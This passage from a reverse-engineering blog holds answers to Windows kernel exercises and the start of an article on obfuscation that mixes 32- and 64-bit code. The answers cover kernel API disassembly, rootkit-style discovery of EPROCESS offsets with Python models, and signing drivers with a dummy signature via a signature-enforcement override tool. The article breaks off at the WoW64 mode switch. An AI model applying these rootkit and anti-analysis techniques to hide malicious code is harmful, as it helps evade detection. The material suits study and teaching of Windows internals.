<span style="font-family: Courier New, Courier, monospace;">MmGetSessionId<span class="Apple-tab-span" style="white-space: pre;"> </span>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+2D8h] KPROCESS.Session</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>xor<span class="Apple-tab-span" style="white-space: pre;"> </span>r8d, r8d</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>or<span class="Apple-tab-span" style="white-space: pre;"> </span>edx, 0FFFFFFFFh</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, r8 KPROCESS.Session == 0 ?</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jz<span class="Apple-tab-span" style="white-space: pre;"> </span>short loc_140036959</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>rcx, cs:PsInitialSystemProcess is the KPROCESS the InitialSystemProcess?</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jz<span class="Apple-tab-span" style="white-space: pre;"> </span>short loc_140036959</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, [rax+8] Session points to a MM_SESSION_SPACE structure, Session+8 is MM_SESSION_SPACE.SessionId</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">loc_140036952:<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmovz<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, r8d if (eax == edx) return 0 else return eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">loc_140036959:<span class="Apple-tab-span" style="white-space: pre;"> </span></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>mov<span class="Apple-tab-span" style="white-space: pre;"> </span>eax, edx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>jmp<span class="Apple-tab-span" style="white-space: pre;"> </span>short loc_140036952</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">MmGetSessionId<span class="Apple-tab-span" style="white-space: pre;"> </span>endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The API gets the KPROCESS from the ETHREAD whose pointer is passed as a parameter, then jumps to MmGetSessionId, which returns the session ID of the process that the thread belongs to. However, if that process is the initial system process, or if its pointer to the MM_SESSION_SPACE is NULL, then it returns 0.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsIsSystemProcess </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>cmp<span class="Apple-tab-span" style="white-space: pre;"> </span>rcx, cs:PsInitialSystemProcess (this is a pointer to an EPROCESS)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>setz<span class="Apple-tab-span" style="white-space: pre;"> </span>al</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsIsSystemProcess endp</span></div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The API compares the EPROCESS pointer passed as a parameter with the EPROCESS pointer stored in the variable PsInitialSystemProcess, and returns whether they are equal.</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif;">
------</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><b>PsGetProcessImageFileName </b>proc near</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>lea<span class="Apple-tab-span" style="white-space: pre;"> </span>rax, [rcx+2E0h] EPROCESS.ImageFileName</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"><span class="Apple-tab-span" style="white-space: pre;"> </span>retn</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">PsGetProcessImageFileName endp</span></div>
</div>
<div style="font-family: Verdana, sans-serif;">
<br /></div>
<div style="font-family: Verdana, sans-serif; text-align: justify;">
The API returns the address of the name of the file used to create the process (EPROCESS.ImageFileName), taken from the EPROCESS whose pointer is passed as a parameter.</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>12) </b></span><br />
<span style="font-family: Verdana, sans-serif; text-align: justify;"><br /></span>
<span style="font-family: Verdana, sans-serif; text-align: justify;">The offsets of the members in the system structures vary across different versions of Windows (and service packs too). In order to locate the members without hardcoding each possible offset, one possible solution would be to locate fields whose value is known, and then use a relative offset to reach nearby ones. For example, in the case of the EPROCESS structure, the ActiveProcessLinks field has the following offsets in different Windows versions (the list is not exhaustive):</span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> (all 32 bit)</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> xp: +0x88</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> vista: +0xA0</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 2003: +0x98</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;"> 7: +0xb8</span></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">However, for all these versions, the UniqueProcessId field is always the one that immediately precedes ActiveProcessLinks, and this property can be leveraged to locate ActiveProcessLinks programmatically without knowing its offset. In fact, knowing the PID of the process that an EPROCESS describes, it is possible to search the entire memory buffer of the EPROCESS structure for the DWORD that contains the known PID value. Once the PID is found, ActiveProcessLinks is located at the following DWORD.</span></div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Another solution could make use of the kernel APIs: in question 11 I have described various APIs that simply retrieve data from system structures. A rootkit could inspect the code of such APIs by disassembling their instructions, and locating the offsets that they use to extract fields from structures. For example, if we consider the opcodes of the following API:</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadProcessId proc near</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">65 48 8B 04 25 88 01 00 00 mov rax, gs:188h KPCR.Prcb.CurrentThread</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">48 8B 80 B8 03 00 00 mov rax, [rax+3B8h] CurrentThread.Cid.UniqueProcess</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">C3 retn</span></div>
<div style="text-align: start;">
<span style="font-family: Courier New, Courier, monospace;">PsGetCurrentThreadProcessId endp</span></div>
</div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">a rootkit could parse them and retrieve the offset of the Cid.UniqueProcess field from the second instruction.</span></div>
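<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">As an added illustration of both approaches (this is not code from the original post, but the same version-independent offset discovery that memory-forensics tools rely on): a Python model that scans a constructed 32 bit EPROCESS buffer for a known PID to derive the ActiveProcessLinks offset, and decodes the <i>mov rax, [...]</i> loads of PsGetCurrentThreadProcessId from the opcodes listed above to recover the 0x3B8 displacement. The EPROCESS buffer, its Flink/Blink values and the decoy copy of the PID are constructed; the sanity check that the two DWORDs after the PID look like kernel-mode pointers is added here to catch a PID value that also appears in an unrelated field.</span></div>

```python
"""Version-independent offset discovery (added example, not the post's code):
(1) scan a 32-bit EPROCESS buffer for a known PID and take the next DWORD as
ActiveProcessLinks; (2) decode the mov loads of a Ps* accessor to recover the
displacement it dereferences (0x3B8 for KTHREAD.Cid.UniqueProcess)."""
import struct

KERNEL_BASE_32 = 0x80000000  # lowest kernel-mode address on 32-bit Windows without /3GB


def find_active_process_links(eprocess, pid):
    """Offset of ActiveProcessLinks in `eprocess` (raw bytes of a 32-bit
    EPROCESS), found as the DWORD after the known PID.  A PID value can also
    show up in unrelated fields, so a candidate is accepted only if the two
    DWORDs following it (Flink, Blink) both look like kernel-mode pointers."""
    candidates = []
    for off in range(0, len(eprocess) - 11, 4):
        if struct.unpack_from("<I", eprocess, off)[0] != pid:
            continue
        flink, blink = struct.unpack_from("<II", eprocess, off + 4)
        if flink >= KERNEL_BASE_32 and blink >= KERNEL_BASE_32:
            candidates.append(off + 4)
    if len(candidates) != 1:
        raise LookupError(f"expected one match, got {candidates}")
    return candidates[0]


def build_fake_eprocess(pid, links_offset, size=0x100):
    """Constructed 32-bit EPROCESS-like buffer (not a real memory dump): a
    decoy copy of the PID at +0x10, UniqueProcessId immediately before
    ActiveProcessLinks, and constructed kernel-mode Flink/Blink values."""
    buf = bytearray(size)
    struct.pack_into("<I", buf, 0x10, pid)                 # decoy field equal to the PID
    struct.pack_into("<I", buf, links_offset - 4, pid)     # UniqueProcessId
    struct.pack_into("<II", buf, links_offset, 0x8A1B2C3D, 0x8A4B5C6D)  # Flink, Blink
    return bytes(buf)


def decode_mov_load(code, pos=0):
    """Decode one `mov r64, [mem]` (opcode 8B) at code[pos] in the forms the
    accessors use: seg:[disp32] (SIB, no base), [reg+disp8], [reg+disp32].
    Returns (segment_override, displacement, position after the instruction)."""
    i, seg = pos, None
    if code[i] in (0x64, 0x65):                  # fs:/gs: segment override prefix
        seg = "fs" if code[i] == 0x64 else "gs"
        i += 1
    if 0x40 <= code[i] <= 0x4F:                  # REX prefix (REX.W = 64-bit operand)
        i += 1
    if code[i] != 0x8B:
        raise ValueError(f"expected mov r,r/m (8B) at {i}, got {code[i]:02x}")
    modrm = code[i + 1]
    i += 2
    mod, rm = modrm >> 6, modrm & 7
    if mod == 3:
        raise ValueError("register-direct mov carries no structure offset")
    if rm == 4:                                  # SIB byte follows the ModRM
        sib = code[i]
        i += 1
        if mod == 0 and (sib & 7) == 5:          # no base register: absolute disp32
            return seg, struct.unpack_from("<I", code, i)[0], i + 4
    if mod == 1:
        return seg, struct.unpack_from("<b", code, i)[0], i + 1
    if mod == 2:
        return seg, struct.unpack_from("<i", code, i)[0], i + 4
    raise ValueError("addressing form without displacement (or RIP-relative)")


def accessor_displacements(func):
    """Walk an accessor's bytes, decoding each mov load until the retn (C3),
    and return the (segment, displacement) pairs it dereferences in order."""
    pairs, pos = [], 0
    while func[pos] != 0xC3:
        seg, disp, pos = decode_mov_load(func, pos)
        pairs.append((seg, disp))
    return pairs


# Opcodes of PsGetCurrentThreadProcessId exactly as listed in the post:
#   65 48 8B 04 25 88 01 00 00   mov rax, gs:188h       KPCR.Prcb.CurrentThread
#   48 8B 80 B8 03 00 00         mov rax, [rax+3B8h]    CurrentThread.Cid.UniqueProcess
#   C3                           retn
PS_GET_CURRENT_THREAD_PROCESS_ID = bytes.fromhex(
    "65 48 8B 04 25 88 01 00 00 48 8B 80 B8 03 00 00 C3")


def cid_unique_process_offset(func=PS_GET_CURRENT_THREAD_PROCESS_ID):
    """The structure offset is the displacement of the last load before retn."""
    return accessor_displacements(func)[-1][1]


if __name__ == "__main__":
    img = build_fake_eprocess(pid=1234, links_offset=0xB8)   # Windows 7 32-bit layout
    print("ActiveProcessLinks at", hex(find_active_process_links(img, 1234)))
    print("loads:", accessor_displacements(PS_GET_CURRENT_THREAD_PROCESS_ID))
    print("Cid.UniqueProcess at", hex(cid_unique_process_offset()))
```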
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>13) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">If you use MmGetPhysicalAddress to resolve a virtual address to a physical address, you have no guarantee that the physical address will still be valid afterwards. For example, if the physical address corresponds to a virtual address in the paged pool, then the data in that physical page may be swapped out to disk at any moment. The physical page would then be filled with other data, used e.g. by some other process, so the driver that called MmGetPhysicalAddress would end up reading the wrong data from physical memory.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">In order to avoid these problems, a driver should first build an MDL describing the virtual memory range that it wants to query, then it should call MmProbeAndLockPages, which makes the pages resident in case they were swapped out, probes them for valid r/w access and locks them in memory so that they won't be paged out (the API should be called from within a try/except statement, since it raises an exception on failure). At this point, the driver can call MmGetPhysicalAddress and be sure that the data in physical memory indeed corresponds to the virtual address, and that it will not be accidentally swapped out.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>14)</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">This exercise consists of setting up test-signing on a 32 bit and a 64 bit machine. I did not dedicate time to this, since it is a quite tedious task which seems more oriented to installing and configuring rather than reverse engineering :( Besides, the whole procedure is described here:</span><br />
<a href="http://msdn.microsoft.com/en-us/library/windows/hardware/ff546236(v=vs.85).aspx" style="background-color: white; color: #1155cc; font-family: arial, sans-serif; text-align: start;" target="_blank"><span style="font-family: Verdana, sans-serif;">http://msdn.microsoft.com/en-us/library/windows/hardware/ff546236(v=vs.85).aspx</span></a><br />
<span style="font-family: Verdana, sans-serif;">Thus, I am going to skip it for now. In my tests I simply used Windows' test mode, and I signed my drivers with a dummy signature using the tool "Driver Signature Enforcement Overrider" (available from <a href="http://www.ngohq.com/?page=dseo">http://www.ngohq.com/?page=dseo</a>).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>15)</b></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>RtlImageNtHeader:</b> takes as input the virtual address of an executable module and returns a pointer to the corresponding PE structure. First, the API validates the input parameter by checking that it is not 0 or -1, and that it points to the signature "MZ" (that is, the signature of an IMAGE_DOS_HEADER structure). After that, the API reads the "e_lfanew" member of the IMAGE_DOS_HEADER structure (that is, the offset of the PE header from the imagebase) and composes the virtual address of the possible PE header by adding "e_lfanew" to the imagebase. The code then evaluates two cases. In the first case, if the address of the PE structure is a kernelmode one (that is, if it is bigger than MmHighestUserAddress), then it simply verifies that it points to the signature "PE\0\0" (the signature of an IMAGE_NT_HEADERS structure) and returns it (or it returns 0 otherwise). In the second case, if the address of the PE structure is in usermode, then it verifies that the whole PE header is contained within usermode (that is, imagebase + sizeof(IMAGE_DOS_HEADER) + sizeof(IMAGE_NT_HEADERS) < MmHighestUserAddress) and returns its address (or it returns 0 otherwise).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"><b>RtlImageDirectoryEntryToData: </b>begins by checking the least significant bit of the ImageBase parameter: if it is set, then the variable "MappedAsImage" is set to 0, and the bit itself is cleared (normally an ImageBase is supposed to be aligned on a page boundary, that is, to have its least significant 12 bits set to zero). The API then obtains the virtual address of the PE header from the ImageBase by calling RtlImageNtHeader, checks the OptionalHeader.Magic field to determine whether the image is a 32 bit or a 64 bit one, and calls either _RtlpImageDirectoryEntryToData32 or _RtlpImageDirectoryEntryToData64, returning its return value (the function _RtlpImageDirectoryEntryToData64 operates in the same way as the 32 bit counterpart, thus it won't be discussed).</span><br />
<span style="font-family: Verdana, sans-serif;">The _RtlpImageDirectoryEntryToData32 function verifies that the input DataDirectory parameter is less than OptionalHeader.NumberOfRvaAndSizes, or else it returns zero. It then reads OptionalHeader.DataDirectory[DataDirectory].RVA, verifies that it is non-zero, and then verifies, in case the input PE file is a usermode one, that the address of the obtained DataDirectory entry is still inside usermode. If the MappedAsImage parameter is nonzero, then the virtual address of the data directory (obtained by adding the RVA to the ImageBase) is returned, along with its size stored in the "Size" parameter. However, if MappedAsImage is zero, some more processing needs to be done. If the RVA of the data directory is within the size of the headers (OptionalHeader.SizeOfHeaders), then it is converted to a VA (again by adding the ImageBase to it) and returned. If it lies beyond the headers, the function needs to call _RtlAddressInSectionTable to convert the RVA to a VA. This step is required because, if the PE file being examined is not mapped as an image, its sections are not laid out according to OptionalHeader.SectionAlignment but according to OptionalHeader.FileAlignment (that is, they are not aligned to virtual memory page boundaries, but to the file offset alignment, which is in general smaller than the virtual one). What the _RtlAddressInSectionTable function does, in fact, is to retrieve the SectionHeader that contains a particular virtual address (through the function _RtlSectionTableFromVirtualAddress), and then use the following formula:</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;"> </span><span style="font-family: Courier New, Courier, monospace;">SectionHeader.PointerToRawData - SectionHeader.VirtualAddress + ImageBase + RVA</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">to convert the RVA into the address of the data in the file-aligned mapping (the ImageBase plus the file offset).</span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">I was not able to find the <b>AuxKlibGetImageExportDirectory</b> API. I searched on my machines, but it does not seem to be part of the standard drivers installation on XP or Windows 7. I tried to locate the driver that exports it to see if I could download it, but I have not found it yet. As soon as I find such a driver I will analyze this API.</span></div>
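<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">A worked model of the logic described above, added here and not the kernel's own code: RtlImageNtHeader, RtlImageDirectoryEntryToData and RtlAddressInSectionTable reimplemented in Python over a constructed minimal PE32, laid out once as a file mapping (sections at FileAlignment) and once as an image mapping (sections at SectionAlignment). Addresses are offsets into the buffer (ImageBase = 0), so the usermode/kernelmode range checks and the ImageBase low-bit convention of the real API are not modelled; the export directory at RVA 0x1010 and the single .rdata section are constructed.</span></div>

```python
"""Added example (not ntoskrnl's code): a model of RtlImageNtHeader,
RtlImageDirectoryEntryToData and RtlAddressInSectionTable over a constructed
PE32.  Addresses are offsets into a bytes object, so ImageBase is 0 and the
user/kernel address-range checks of the real APIs are not modelled."""
import struct

IMAGE_NT_OPTIONAL_HDR32_MAGIC = 0x10B
IMAGE_NT_OPTIONAL_HDR64_MAGIC = 0x20B
IMAGE_DIRECTORY_ENTRY_EXPORT = 0
IMAGE_DIRECTORY_ENTRY_IMPORT = 1


def image_nt_header(image):
    """RtlImageNtHeader: validate the MZ stub, follow e_lfanew, validate the
    PE signature; return the offset of IMAGE_NT_HEADERS or None."""
    if len(image) < 0x40 or image[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if e_lfanew + 4 > len(image) or image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    return e_lfanew


def section_table(image, nt):
    """Yield (VirtualAddress, SizeOfRawData, PointerToRawData) per section."""
    n_sections = struct.unpack_from("<H", image, nt + 6)[0]
    opt_size = struct.unpack_from("<H", image, nt + 20)[0]
    first = nt + 24 + opt_size                      # first IMAGE_SECTION_HEADER
    for k in range(n_sections):
        yield struct.unpack_from("<III", image, first + 40 * k + 12)


def address_in_section_table(image, nt, rva):
    """RtlAddressInSectionTable for a file-aligned mapping: find the section
    holding `rva`, then PointerToRawData - VirtualAddress + ImageBase + RVA
    (ImageBase is the start of the buffer, i.e. 0)."""
    for va, raw_size, raw_ptr in section_table(image, nt):
        if va <= rva < va + raw_size:
            return raw_ptr - va + rva
    return None


def image_directory_entry_to_data(image, mapped_as_image, directory):
    """RtlImageDirectoryEntryToData: (offset, size) of a data directory, or
    None when the headers, the directory index or the RVA are invalid."""
    nt = image_nt_header(image)
    if nt is None:
        return None
    opt = nt + 24                                   # IMAGE_OPTIONAL_HEADER
    magic = struct.unpack_from("<H", image, opt)[0]
    if magic == IMAGE_NT_OPTIONAL_HDR32_MAGIC:
        nrva_off, dir_off = opt + 92, opt + 96
    elif magic == IMAGE_NT_OPTIONAL_HDR64_MAGIC:
        nrva_off, dir_off = opt + 108, opt + 112
    else:
        return None
    if directory >= struct.unpack_from("<I", image, nrva_off)[0]:
        return None                                 # index >= NumberOfRvaAndSizes
    rva, size = struct.unpack_from("<II", image, dir_off + 8 * directory)
    if rva == 0:
        return None
    size_of_headers = struct.unpack_from("<I", image, opt + 60)[0]
    if mapped_as_image or rva < size_of_headers:
        return rva, size                            # VA = ImageBase + RVA
    offset = address_in_section_table(image, nt, rva)
    return None if offset is None else (offset, size)


def build_test_pe(mapped_as_image):
    """Constructed minimal PE32: one section .rdata (RVA 0x1000, raw data at
    file offset 0x200) and an export directory at RVA 0x1010 of size 0x40."""
    hdr = bytearray(0x200)                          # SizeOfHeaders
    hdr[:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)         # e_lfanew
    nt = 0x80
    hdr[nt:nt + 4] = b"PE\0\0"
    # FileHeader: Machine=i386, 1 section, SizeOfOptionalHeader=0xE0
    struct.pack_into("<HHIIIHH", hdr, nt + 4, 0x14C, 1, 0, 0, 0, 0xE0, 0x102)
    opt = nt + 24
    struct.pack_into("<H", hdr, opt, IMAGE_NT_OPTIONAL_HDR32_MAGIC)
    struct.pack_into("<I", hdr, opt + 60, 0x200)    # SizeOfHeaders
    struct.pack_into("<I", hdr, opt + 92, 16)       # NumberOfRvaAndSizes
    struct.pack_into("<II", hdr, opt + 96, 0x1010, 0x40)   # export directory
    sect = opt + 0xE0
    hdr[sect:sect + 8] = b".rdata\0\0"
    # VirtualSize, VirtualAddress, SizeOfRawData, PointerToRawData
    struct.pack_into("<IIII", hdr, sect + 8, 0x100, 0x1000, 0x200, 0x200)
    section = b"\0" * 0x10 + b"EXPORTS!" + b"\0" * (0x200 - 0x18)
    if mapped_as_image:
        return bytes(hdr) + b"\0" * (0x1000 - 0x200) + section  # at RVA 0x1000
    return bytes(hdr) + section                                 # at file offset 0x200


if __name__ == "__main__":
    for as_image in (False, True):
        pe = build_test_pe(as_image)
        off, size = image_directory_entry_to_data(pe, as_image, IMAGE_DIRECTORY_ENTRY_EXPORT)
        print(f"mapped_as_image={as_image}: export dir at {off:#x}, size {size:#x},"
              f" bytes {pe[off:off + 8]!r}")
```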
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>16) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">To track the life and death of processes I would set a callback with PsSetCreateProcessNotifyRoutine in order to be notified whenever a process is created or terminated. To track each process I would use the ProcessIDs, which uniquely identify them. If I need more information (e.g. the image name of the process) I would retrieve it from the EPROCESS structure.</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><b>17) </b></span><br />
<span style="font-family: Verdana, sans-serif;"><br /></span>
<span style="font-family: Verdana, sans-serif;">The page directory is stored in the DirectoryTableBase field of the EPROCESS structure:</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;"><br /></span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">+0x028 DirectoryTableBase : 0x3db1f000</span></div>
<div style="text-align: justify;">
<span style="font-family: Courier New, Courier, monospace;">(EPROCESS.Pcb.DirectoryTableBase)</span></div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
</div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">Code obFU(N)scation mixing 32 and 64 bit mode instructions</span></b><br />
<span style="font-family: Verdana, sans-serif;">giulia, 2014-10-28</span><br />
<b><span style="font-family: Verdana, sans-serif; font-size: large;">1 - Introduction</span></b><br />
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This article is about a fun way to obfuscate code that takes advantage of the ability of 64bit Windows to manage and run 32bit processes. As we will see, it is a very effective technique that can make analysis really time consuming and annoying.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">64bit Windows natively runs 64bit processes and kernel drivers but, for backward compatibility, it also offers the possibility to run old 32bit executables through the WoW64 subsystem. On the Intel x86-64 architecture this is implemented via hardware features of the CPU that allow 32bit mode code to switch to 64bit mode and vice versa.</span></div>
</div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The trick relies on these 32bit/64bit switches: you can craft an executable that contains <u><i>both</i></u> 32bit and 64bit code, and you can make the code jump from one to the other at any time. Unfortunately, almost all debuggers seem to be ineffective in dealing with these jumps (only remote kernel debugging with WinDbg can step through the code). </span><br />
<span style="font-family: Verdana, sans-serif;">Disassemblers don't handle the situation very well either, as they are designed to handle only one architecture at a time.</span><br />
<span style="font-family: Verdana, sans-serif;">Long story short: a real mess and a nightmare for analysis!</span></div>
</div>
</div>
<div>
<br /></div>
<div>
<b><span style="font-family: Verdana, sans-serif; font-size: large;">2 - 32bit/64bit switch</span></b></div>
<div>
<b><span style="font-family: Verdana, sans-serif;"><br /></span></b></div>
<div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">Let's start by analysing how the switch between 32bit and 64bit works; then we can see how it can be abused and what problems it causes to static analysis tools.</span></div>
</div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Verdana, sans-serif;">2.1 - The basics: how it works</span></b></div>
<div>
<span style="font-family: Verdana, sans-serif;"><br /></span></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">The best way to understand how 64bit Windows handles 32bit processes is to see it in action: let's start a remote kernel debugging session and see what happens when we debug a 32bit process. In particular, we are going to debug the 32bit API CreateFile to see how the code interfaces with the 64bit operating system. Starting from the API entry point, we will arrive at the following code:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b62b 89450c mov dword ptr [ebp+0Ch],eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b62e 8d45f8 lea eax,[ebp-8]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b631 50 push eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b632 ffd6 call esi {ntdll_772b0000!ZwCreateFile}</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b634 8bd8 mov ebx,eax</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b636 bf220000c0 mov edi,0C0000022h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`7698b63b 3bdf cmp ebx,edi</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">This is where the library KERNELBASE.dll calls the ntdll.dll API </span><span style="font-family: Courier New, Courier, monospace;">ZwCreateFile</span><span style="font-family: Verdana, sans-serif;">. In good old 32bit Windows, ntdll, among other things, acts as a wrapper providing the transition from usermode to kernelmode (that is, it implements the syscall stubs). Now things are different: we step into the call and we get:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">ntdll_772b0000!ZwCreateFile:</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00a4 b852000000 mov eax,52h</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00a9 33c9 xor ecx,ecx</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00ab 8d542404 lea edx,[esp+4]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00af 64ff15c0000000 call dword ptr fs:[0C0h]</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00b6 83c404 add esp,4</span></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">00000000`772d00b9 c22c00 ret 2Ch</span></div>
<div>
<br /></div>
<div>
<div style="text-align: justify;">
<span style="font-family: Verdana, sans-serif;">There is no </span><span style="font-family: Courier New, Courier, monospace;">sysenter/syscall/int 2E</span><span style="font-family: Verdana, sans-serif;"> here, so this code is not calling the kernel yet. Instead, it is calling the following:</span></div>
</div>
<div>
<br /></div>
<div>
<span style="font-family: Courier New, Courier, monospace;">wow64cpu!X86SwitchTo64BitMode:</span></div>
<div>
